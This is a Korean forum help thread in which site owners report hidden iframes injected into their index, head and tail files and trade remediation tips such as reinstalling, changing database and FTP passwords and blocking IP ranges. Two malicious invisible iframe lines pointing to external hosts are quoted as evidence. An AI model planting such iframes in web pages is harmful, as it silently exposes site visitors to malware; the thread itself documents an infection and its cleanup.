바이러스인지 알려주세요... ㅠ.ㅜ 정보
바이러스인지 알려주세요... ㅠ.ㅜ본문
오류가 나는곳의 주소를 알려주시면 더 빠르고 정확하게 답변 받을 수 있습니다.
오류 주소 :
<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>
위 내용이 index , head, tail 등 시작페이지 파일들마다 맨 아래에 들어가 있네요...
이거 해킹인가요? 바이러스 인가요?
저는 초보라 잘 몰라서 질문 드립니다.
어제부터 리모트 데이타 프로그램을 깔라고 홈에 접속하면 가끔 뜨길레 이상하다 생각되서 소스보기를 하니 위 내용이 4개나 나와서 찾아서 다 지웠습니다.
어떤경로로 저게 들어갈수 있죠???
저는 넣지 않았는데... 없던게 새로 들어가 있네요... ㅠ.ㅠ
오류 주소 :
<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>
위 내용이 index , head, tail 등 시작페이지 파일들마다 맨 아래에 들어가 있네요...
이거 해킹인가요? 바이러스 인가요?
저는 초보라 잘 몰라서 질문 드립니다.
어제부터 리모트 데이타 프로그램을 깔라고 홈에 접속하면 가끔 뜨길레 이상하다 생각되서 소스보기를 하니 위 내용이 4개나 나와서 찾아서 다 지웠습니다.
어떤경로로 저게 들어갈수 있죠???
저는 넣지 않았는데... 없던게 새로 들어가 있네요... ㅠ.ㅠ
댓글 전체
지금 확인하니 plugin 폴더에 index 파일들에도 모두 들어가 있네요....
<iframe src="http://216.186.51.70/index.php" width=1 height=1 style="visibility:hidden"></iframe>
저도 위와같은 악성코드가 인덱스 파일마다 심어져 있네요..
또 시작이네요..지우는것도 짜증,,ㅡ,.ㅡ^^
저도 위와같은 악성코드가 인덱스 파일마다 심어져 있네요..
또 시작이네요..지우는것도 짜증,,ㅡ,.ㅡ^^
저도 그러는데 이거 해결방법이 없는건가요? 아이고야~~~
저희 사이트도 작년 바이러스 공격에 의해 두달정도 죽을 고생을 한적이 있습니다.
그때 행사가 겹치는 바람에 들어오는 소스만 계속 지우는 방법을 사용 했었구요.
현재는 바이러스가 들어오지 않고 있습니다.
그때 제가 했던 방법이 테스트 서버를 하나 열어서 그곳에 그누보드 최신 버젼으로 깐 후
디자인만 똑같이 만든 후에 기존 사이트 소스만 날린 후 업어 치기 했습니다.
그런데 이놈이 다시 들어오는 것입니다.
그래서 db 계정부터 비밀번호 싹 바꿔 주고 업어치기 다시 하고
호스팅 업체랑 말해서 알려진 악성 IP 대역 다 차단 시키고 나니 그 후부터 쭉 조용합니다.
그때 ㅠ_ㅠ 진짜 행사하면서 바이러스 언제 들어오나 식은땀이 계속 나는지...
그때 행사가 겹치는 바람에 들어오는 소스만 계속 지우는 방법을 사용 했었구요.
현재는 바이러스가 들어오지 않고 있습니다.
그때 제가 했던 방법이 테스트 서버를 하나 열어서 그곳에 그누보드 최신 버젼으로 깐 후
디자인만 똑같이 만든 후에 기존 사이트 소스만 날린 후 업어 치기 했습니다.
그런데 이놈이 다시 들어오는 것입니다.
그래서 db 계정부터 비밀번호 싹 바꿔 주고 업어치기 다시 하고
호스팅 업체랑 말해서 알려진 악성 IP 대역 다 차단 시키고 나니 그 후부터 쭉 조용합니다.
그때 ㅠ_ㅠ 진짜 행사하면서 바이러스 언제 들어오나 식은땀이 계속 나는지...
오 모두들 답변 감사합니다. 저는 일단 읽기 실행하기만 하는 파일권한 505 로 했는데 이걸로 막아지려나요?
ftp 비밀번호를 변경하니 지금까지는 (약 3일) 안들어오고 있어요..
저도 쌩고생을 ㅡㅜ
저도 쌩고생을 ㅡㅜ